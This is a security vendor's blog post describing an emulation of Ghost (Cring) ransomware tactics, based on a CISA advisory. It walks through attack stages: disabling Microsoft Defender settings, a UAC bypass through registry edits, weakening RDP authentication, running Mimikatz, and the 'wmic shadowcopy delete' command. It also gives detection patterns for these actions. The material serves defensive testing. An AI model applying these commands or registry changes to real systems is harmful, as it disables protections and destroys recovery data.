On February 19, 2025, the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) released a joint Cybersecurity Advisory (CSA) to disseminate known Ghost ransomware Indicators of Compromise (IOCs) and Tactics, Techniques, and Procedures (TTPs) identified through FBI investigations as recently as January 2025.
This joint CSA is a continuation of CISA’s ongoing #StopRansomware effort to arm defenders with the intelligence needed to combat different ransomware variants and ransomware threat actors.
Ghost, also known as Cring, is a ransomware strain that has been conducting attacks against publicly facing services found to be running outdated software and firmware versions since early 2021.
Based in China, its operators employ publicly available code to exploit Common Vulnerabilities and Exposures (CVEs) and gain access to internet-facing servers. They exploit well-known vulnerabilities and target networks where available patches have not been applied.
Its indiscriminate targeting of networks containing vulnerabilities has led to the compromise of organizations across more than 70 countries, including organizations in China. Affected victims include critical infrastructure, schools and universities, healthcare, government networks, religious institutions, technology and manufacturing companies, and numerous small to medium-sized businesses.
Ghost operators rotate their ransomware executable payloads, switch file extensions for encrypted files, modify ransom note text, and use numerous ransom email addresses, which has led to variable attribution of this group over time.
AttackIQ has released a new attack graph composed the several Tactics, Techniques and Procedures (TTPs) exhibited by Ghost ransomware during its most recent activities with the aim of helping customers validate their security controls and their ability to defend against this sophisticated and recent threat.
Validating your security program performance against these behaviors is vital in reducing risk. By using this new assessment template in the AttackIQ Security Optimization Platform, security teams will be able to:
- Evaluate security control performance against the behaviors exhibited by a threat that conducts worldwide ransomware activities.
- Assess their security posture against activities focused on both exfiltration and encryption of sensitive information.
- Continuously validate detection and prevention pipelines against a playbook similar to those of many of the groups currently focused on ransomware activities.
[CISA AA25-050A] #StopRansomware: Ghost (Cring) Ransomware
(Click for Larger)This attack graph emulates the several Tactics, Techniques and Procedures (TTPs) exhibited by Ghost ransomware during its most recent activities.
This emulation is based on the Cybersecurity Advisory (CSA) released by CISA on February 19, 2025, and supported by a report published by Trend Micro on September 24, 2021.
Execution & Privilege Escalation – Impersonate Logged-On User
(Click for Larger)This stage begins with the execution of an encoded PowerShell command which is used to perform the deployment of Cobalt Strike Beacon. Subsequently, a local account is created to acquire persistence in the compromised environment.
Command and Scripting Interpreter: PowerShell (T1059.001): This scenario encodes a user-defined PowerShell script into base64 and then executes it using PowerShell's -encodedCommand parameter.
Ingress Tool Transfer (T1105): These scenarios download to memory and save to disk in independent scenarios to test network and endpoint controls and their ability to prevent the delivery of known malicious samples.
Create Account: Local Account (T1136.001): This scenario executes the net user native command to create a new local account.
Defense Evasion & Lateral Movement – Disable Microsoft Defender
(Click for Larger)This stage begins by obtaining process information through Windows Management Instrumentation (WMI) and continues with the modification of Microsoft Defender settings in order to disable it and avoid detection. Subsequently, the Mimikatz tool is employed to gather system credentials that can potentially be used to perform lateral movement to a remote system.
Windows Management Instrumentation (WMI) (T1047): This scenario obtains process information by executing the Win32_Process WMI command.
Impair Defenses: Disable or Modify Tools (T1562.001): This scenario uses the Set-MpPreference PowerShell cmdlet to modify the DisableRealtimeMonitoring setting in Microsoft Defender.
Impair Defenses: Disable or Modify Tools (T1562.001): This scenario uses the Set-MpPreference PowerShell cmdlet to modify the DisableBehaviorMonitoring setting in Microsoft Defender.
Impair Defenses: Disable or Modify Tools (T1562.001): This scenario uses the Set-MpPreference PowerShell cmdlet to modify the DisableIOAVProtection setting in Microsoft Defender.
Impair Defenses: Disable or Modify Tools (T1562.001): This scenario uses the Set-MpPreference PowerShell cmdlet to modify the MAPSReporting setting in Microsoft Defender.
OS Credential Dumping (T1003): This scenario uses an obfuscated version of Mimikatz to dump passwords and hashes available on the compromised environment.
Persistence & Defense Evasion – Set Image File Execution Options (IFEO) and Disable Security Features
(Click for Larger)This stage begins with the deployment of a support batch (BAT) file designed to bypass User Account Control (UAC) by modifying the EnableLua registry value.
Next, Image File Execution Options (IFEO) are configured to establish persistence, ensuring continued execution. The stage concludes with registry modifications to enhance remote accessibility and maintain control over the target system by enabling remote desktop connections, enabling unsolicited remote assistance, enabling negotiation security layer authentication and disabling Network Layer Authentication (NLA).
Bypass User Account Control (T1548.002): This scenario attempts to bypass UAC by modifying the EnableLUA registry value under the HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System registry key.
Event Triggered Execution: Image File Execution Options Injection (T1546.012): This scenario sets Image File Execution Options (IFEO) through registry modifications under the HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ of a specific process.
Impair Defenses: Disable or Modify Tools (T1562.001): This scenario sets the registry key HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services\fDenyTSConnections to 0 which will enable remote access to the system using Remote Desktop.
Impair Defenses: Disable or Modify Tools (T1562.001): This scenario sets the registry key HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services\fAllowUnsolicited to 1 which will enable unsolicited remote assistance for remote desktop connections to the system.
Impair Defenses: Disable or Modify Tools (T1562.001): This scenario sets the registry HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services\UserAuthentication to 0 which will disable Network Layer Authentication (NLA) for remote desktop connections to the host.
Impair Defenses: Disable or Modify Tools (T1562.001): This scenario sets the HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\SecurityLayer to 1 which will enable the Network Security Layer Authentication for remote desktop connections to the host.
Impact – Ghost Ransomware Deployment
(Click for Larger)This stage begins with the deployment of Ghost ransomware, followed by the execution of a support BAT script designed to disable security controls, clear Windows Event Logs, and delete volume shadow copies using a Windows Management Instrumentation Command (WMIC).
Finally, system file encryption is performed using an algorithm similar to that employed by Ghost ransomware, combining AES-256 and RSA-4096.
Inhibit System Recovery (T1490): This scenario executes the wmic shadowcopy delete command to delete a recent Volume Shadow Copy created by the emulation.
Data Encrypted for Impact (T1486): This scenario simulates the file encryption routine used by common ransomware families. Files matching an extension list are identified and encrypted in place using the same encryption algorithms observed during this activity.
Opportunities to Expand Emulation Capabilities
In addition to the released assessment template, AttackIQ recommends the following existing scenarios to extend the emulation of the capabilities exhibited in this advisory:
- GodPotato is a privilege escalation tool that exploits Windows Distributed Component Object Model (DCOM) services to obtain SYSTEM privileges. Associated existing scenarios:
- Download 2023-04 GodPotato v1.20 Sample to Memory
- Save 2023-04 GodPotato v1.20 to File System
- SharpShares is a .NET-based reconnaissance tool used to enumerate Server Message Block (SMB) network shares within a Windows environment. Associated existing scenarios:
- Download 2021-08 SharpShares v2.4 Sample to Memory
- Save 2021-08 SharpShares v2.4 to File System
- Access Token Manipulation: This scenario lists and duplicates the access tokens of the running processes available on the target system in order to escalate privileges. It allows the execution of arbitrary commands by impersonating a logged-in user.
- Lateral Movement Through WMI: This scenario attempts to move laterally to any available asset inside the network through the use of WMI. If the remote asset can be accessed, a configurable command is executed.
Detection and Mitigation Opportunities
Given the number of different techniques being utilized by this threat, it can be difficult to know which to prioritize for prevention and detection opportunities. AttackIQ recommends first focusing on the following techniques emulated in our scenarios before moving on to the remaining techniques.
1. Review CISA’s Patching and Detection Recommendations:
CISA has provided a significant number of recommendations for the best ways to defend yourself from these and similar attacks. AttackIQ strongly recommends reviewing the detection and mitigation recommendations to adapt them to your environment first to determine if you have any existing impact before reviewing the assessment results.
2. Ingress Tool Transfer (T1105):
Adversaries often rely heavily on downloading additional stages of malware. Endpoint and Network security controls should both be employed to try and detect the delivery of these malicious payloads.
2a. Detection
The following signatures can help identify when native utilities are being used to download malicious payloads.
PowerShell Example:
Process Name == (Cmd.exe OR Powershell.exe)
Command Line CONTAINS ((“IWR” OR “Invoke-WebRequest") AND “DownloadData” AND “Hidden”)
2b. Mitigation
MITRE ATT&CK has the following mitigation recommendations.
3. Inhibit System Recovery (T1490):
Adversaries often delete Volume Shadow Copies to prevent the possibility of restoring files back to their original state. This is a common technique used by ransomware as it prevents the recovery of files once the ransomware encryption routine successfully completes execution.
3a. Detection
Detecting deletion of Volume Shadow Copies is usually the first step that occurs and can be detected by looking at the command line activity
Process Name == (cmd.exe OR powershell.exe OR wmic.exe)
Command Line CONTAINS (“wmic” AND “shadowcopy” AND “delete”)
3b. Mitigation
MITRE ATT&CK has the following mitigation recommendations for Inhibit System Recovery
Wrap-up
In summary, this attack graph will evaluate security and incident response processes and support the improvement of your security control posture against the recent activities carried out by Ghost ransomware operators. With data generated from continuous testing and use of this assessment template, you can focus your teams on achieving key security outcomes, adjust your security controls, and work to elevate your total security program effectiveness against a widely distributed and dangerous threat.
AttackIQ®, the leading provider of Adversarial Exposure Validation (AEV) solutions, is trusted by top organizations worldwide to validate security controls in real time. By emulating real-world adversary behavior, AttackIQ closes the gap between knowing about a vulnerability and understanding its true risk. AttackIQ’s AEV platform aligns with the Continuous Threat Exposure Management (CTEM) framework, enabling a structured, risk-based approach to ongoing security assessment and improvement. The company is committed to supporting its MSSP partners with a Flexible Preactive Partner Program that provides turn-key solutions, empowering them to elevate client security. AttackIQ is passionate about giving back to the cybersecurity community through its free award-winning AttackIQ Academy and founding research partnership with MITRE Center for Threat-Informed Defense.
